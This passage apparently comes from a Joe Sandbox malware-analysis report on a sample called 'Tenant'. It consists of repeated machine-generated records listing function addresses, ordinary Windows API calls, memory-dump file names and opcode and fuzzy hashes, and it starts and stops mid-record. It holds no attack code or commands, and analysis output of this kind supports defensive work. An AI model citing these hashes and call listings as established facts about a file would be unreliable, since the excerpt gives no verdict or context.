                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: 3fd1b7ae3ffdb3fc52b6ae1edb7ce8b2bcfa93db80b70d65ada1474c64b868a9
                                                                                        • Instruction ID: a4fd37cd00dbf1277fc6dcc6f5cc0d110af2a6185e242a7b7e2c4f435ae94860
                                                                                        • Opcode Fuzzy Hash: 3fd1b7ae3ffdb3fc52b6ae1edb7ce8b2bcfa93db80b70d65ada1474c64b868a9
                                                                                        • Instruction Fuzzy Hash: 2B11BE3A200349AFCB25AF64D845D7E77A8FF45350B40402EFA06CB2A0EB719940C795
                                                                                        Function 00AD5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00AD5331
                                                                                          • Part of subcall function 00AC593C: __FF_MSGBANNER.LIBCMT ref: 00AC5953
                                                                                          • Part of subcall function 00AC593C: __NMSG_WRITE.LIBCMT ref: 00AC595A
                                                                                          • Part of subcall function 00AC593C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,?,00000004,?,?,00AC1003,?), ref: 00AC597F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: d8c96e75e24e3fd1ca379b513aa166463fcc31f8f4101b2f397e138b484914de
                                                                                        • Instruction ID: 487d540e2427fba2e052799d458817a6cae8614ac09208e5b988898553fcdeeb
                                                                                        • Opcode Fuzzy Hash: d8c96e75e24e3fd1ca379b513aa166463fcc31f8f4101b2f397e138b484914de
                                                                                        • Instruction Fuzzy Hash: 54119832905A19AFCF253F74E925B9E3A946F143A0B11451FF4569F290DE7489409790
                                                                                        Function 00B04365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B04385
                                                                                        • _memset.LIBCMT ref: 00B043A6
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B043F8
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B04401
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: d253bdae6f2f47d2286d781b9250c72c86d98c71531f7a28c79b8b08b325226f
                                                                                        • Instruction ID: 86643eb481b3578880cc8328da5451c70a1e70cd627b1c825a8654f09def5091
                                                                                        • Opcode Fuzzy Hash: d253bdae6f2f47d2286d781b9250c72c86d98c71531f7a28c79b8b08b325226f
                                                                                        • Instruction Fuzzy Hash: 3C1198B59012287AD7309BA5AC4DFAFBB7CEF45760F1045DAF908E7190D6744E808BA4
                                                                                        Function 00B16A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07E51,?,?,00000000), ref: 00AB4041
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07E51,?,?,00000000,?,?), ref: 00AB4065
                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00B16A84
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16A8F
                                                                                        • _memmove.LIBCMT ref: 00B16ABC
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00B16AC7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 1504782959-0
                                                                                        • Opcode ID: eb6b912e64a167b8bfd1af29637bdce0cd4561042c17309de6409ce253267eab
                                                                                        • Instruction ID: 2a95e7ca41dd7eb689c86435295c153c2d3131b111b3f8c1b43312901e54c018
                                                                                        • Opcode Fuzzy Hash: eb6b912e64a167b8bfd1af29637bdce0cd4561042c17309de6409ce253267eab
                                                                                        • Instruction Fuzzy Hash: 5F116072500108EFCB04FBA4CE96DEEB7B8EF49311B544165F502A72A2DF31AE04DBA1
                                                                                        Function 00AF96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9719
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF972B
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF9741
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF975C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 404d0ae7d3d19f47025ef8af2b2d7eb50f1283d1844cce0b73207ea6b78e8e57
                                                                                        • Instruction ID: 860ad4554c3fb58db9f1ca7ad4f70ce08c915467b1fc0829eecb225ef9607b8e
                                                                                        • Opcode Fuzzy Hash: 404d0ae7d3d19f47025ef8af2b2d7eb50f1283d1844cce0b73207ea6b78e8e57
                                                                                        • Instruction Fuzzy Hash: E9114839900218FFEB10EF95C985FAEBBB8FB48710F204091FA00B7290D6716E10DB90
                                                                                        Function 00AA166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00AA16B4
                                                                                        • GetClientRect.USER32(?,?), ref: 00ADB93C
                                                                                        • GetCursorPos.USER32(?), ref: 00ADB946
                                                                                        • ScreenToClient.USER32(?,?), ref: 00ADB951
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: dd0c42998766ccf3ef15cc23c30cc8179d45aa1a9b411e588d617c1560a4371c
                                                                                        • Instruction ID: 91604ca3122a450cadd23a47c08e50007782549fab3937cd5aca0358b67b420c
                                                                                        • Opcode Fuzzy Hash: dd0c42998766ccf3ef15cc23c30cc8179d45aa1a9b411e588d617c1560a4371c
                                                                                        • Instruction Fuzzy Hash: 2F112835A10119BBCB10EF58D999DBE77B8EF06301F140456F941E7290DB34BA51CBA1
                                                                                        Function 00AA2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                        • GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 046a569060183ee826fd745a8cbca5e469a524ca780b1002f185a9cc7a3cfd78
                                                                                        • Instruction ID: a809c02df83b406f2ca87656ccb87d1cf769daf8975c2b33f61d8ef774ab6896
                                                                                        • Opcode Fuzzy Hash: 046a569060183ee826fd745a8cbca5e469a524ca780b1002f185a9cc7a3cfd78
                                                                                        • Instruction Fuzzy Hash: 5111AD72101509BFDF025F949C55EEBBB69EF59354F150212FA0453190CB31DC60EFA0
                                                                                        Function 00B01941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B0195E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B01983
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B0198D
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B019C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID:
                                                                                        • API String ID: 2875609808-0
                                                                                        • Opcode ID: 795f019c1493ecea3acc1609edd4ad5ab6cce50c65af59926c4551909a4d0e59
                                                                                        • Instruction ID: 17b3f1d3417b50c118a2ac94297dcce5f09c5ffc178ae0107706cdb95f5c4bcf
                                                                                        • Opcode Fuzzy Hash: 795f019c1493ecea3acc1609edd4ad5ab6cce50c65af59926c4551909a4d0e59
                                                                                        • Instruction Fuzzy Hash: 79113031D0461DDBCF04AFA9D998BEDBFB8FF08751F114595E940B2280CB3095518B91
                                                                                        Function 00B2E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B2E1EA
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B2E201
                                                                                        • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B2E216
                                                                                        • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B2E234
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                        • String ID:
                                                                                        • API String ID: 1352324309-0
                                                                                        • Opcode ID: dfa2f7c8ab5c9f83ed94be7e2c16037862c49e6a3851dcbc147c12a19364d485
                                                                                        • Instruction ID: edc3bec711bf6bc74abf55f10849efd38fd3f3686531a7f70bc4ad248be23212
                                                                                        • Opcode Fuzzy Hash: dfa2f7c8ab5c9f83ed94be7e2c16037862c49e6a3851dcbc147c12a19364d485
                                                                                        • Instruction Fuzzy Hash: A1115EB5205324DBE7309F52FD48F97BBFCEF04B00F108599A62AD6550D7B0E5049BA1
                                                                                        Function 00AD71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction ID: c84e2adca8942656453d6fe71073b3b4c94b8a0ef6c91d2cb90d4282332277d7
                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction Fuzzy Hash: 4801953204818EBBCF1A5F84CC41CED3F22BB19340B048516FE1958231E736C9B1AB81
                                                                                        Function 00B2B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B2B956
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2B96E
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2B992
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2B9AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: 4e5fbfbb6f4a0a442d3158df6ea3b5431dddebd44e3d6492a7947cc51d54cd8c
                                                                                        • Instruction ID: 6f3fefe888e288e1528d4e6f09c7002e01135916b5b6f794f012555a3ba0d899
                                                                                        • Opcode Fuzzy Hash: 4e5fbfbb6f4a0a442d3158df6ea3b5431dddebd44e3d6492a7947cc51d54cd8c
                                                                                        • Instruction Fuzzy Hash: DD1174B9D00209EFDB41DF98D885AEEBBF9FF48310F108156E914E3614DB31AA618F50
                                                                                        Function 00B2BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B2BCB6
                                                                                        • _memset.LIBCMT ref: 00B2BCC5
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B68F20,00B68F64), ref: 00B2BCF4
                                                                                        • CloseHandle.KERNEL32 ref: 00B2BD06
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: ca4c9f16b44caadf78eb1cc2482c124e5f2af4cc132a543716e9afaf3575c588
                                                                                        • Instruction ID: 5bc08357f83b7a94b2714b28f362ddecabdae7f9627e07b43b6500ad1b6c4216
                                                                                        • Opcode Fuzzy Hash: ca4c9f16b44caadf78eb1cc2482c124e5f2af4cc132a543716e9afaf3575c588
                                                                                        • Instruction Fuzzy Hash: 18F05EB35403047FE7503761AC25FBB3A9DEB08754F004921FA08DA1A2DFB9481097A8
                                                                                        Function 00B07195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00B071A1
                                                                                          • Part of subcall function 00B07C7F: _memset.LIBCMT ref: 00B07CB4
                                                                                        • _memmove.LIBCMT ref: 00B071C4
                                                                                        • _memset.LIBCMT ref: 00B071D1
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00B071E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 48991266-0
                                                                                        • Opcode ID: 55b5423f4a369859336159e35c01fa5e873f263bb52e4fe437f4ca87752cf57d
                                                                                        • Instruction ID: d2fc265be703e535826ac4c0f4bbb415936e3f4a2a5eb4cd667d681260944c10
                                                                                        • Opcode Fuzzy Hash: 55b5423f4a369859336159e35c01fa5e873f263bb52e4fe437f4ca87752cf57d
                                                                                        • Instruction Fuzzy Hash: D6F03A3A200104ABCF116F55DC85F8ABB69EF49320F08C095FE085F26ACB31A911DBB4
                                                                                        Function 00B2C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA1729
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1738
                                                                                          • Part of subcall function 00AA16CF: BeginPath.GDI32(?), ref: 00AA174F
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1778
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C3E8
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00B2C3F5
                                                                                        • EndPath.GDI32(00000000), ref: 00B2C405
                                                                                        • StrokePath.GDI32(00000000), ref: 00B2C413
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: 696754f54f063b96ea4bfc8a3e9b1421b9e0d44dc63017adfe1f17c414b82dc7
                                                                                        • Instruction ID: 14b4c823ce89e72c869ff1b2473ab0d559615b3eaeebe7195091d929fd99521c
                                                                                        • Opcode Fuzzy Hash: 696754f54f063b96ea4bfc8a3e9b1421b9e0d44dc63017adfe1f17c414b82dc7
                                                                                        • Instruction Fuzzy Hash: 2DF0BE31045228BBDB137F51AC0EFCE3F99AF06310F148040FA11671E28BB81961DFA9
                                                                                        Function 00AFAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFAA6F
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFAA82
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AFAA89
                                                                                        • AttachThreadInput.USER32(00000000), ref: 00AFAA90
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 854ec097bec7aa7a9aaa9b59b1c23b1c2dafaed0fd9a9208b3a85cf14f71ed78
                                                                                        • Instruction ID: 5c119c028a58e76a004f40b9ce3cb1b26f7e5f717f4d5e511c184910f7bc256c
                                                                                        • Opcode Fuzzy Hash: 854ec097bec7aa7a9aaa9b59b1c23b1c2dafaed0fd9a9208b3a85cf14f71ed78
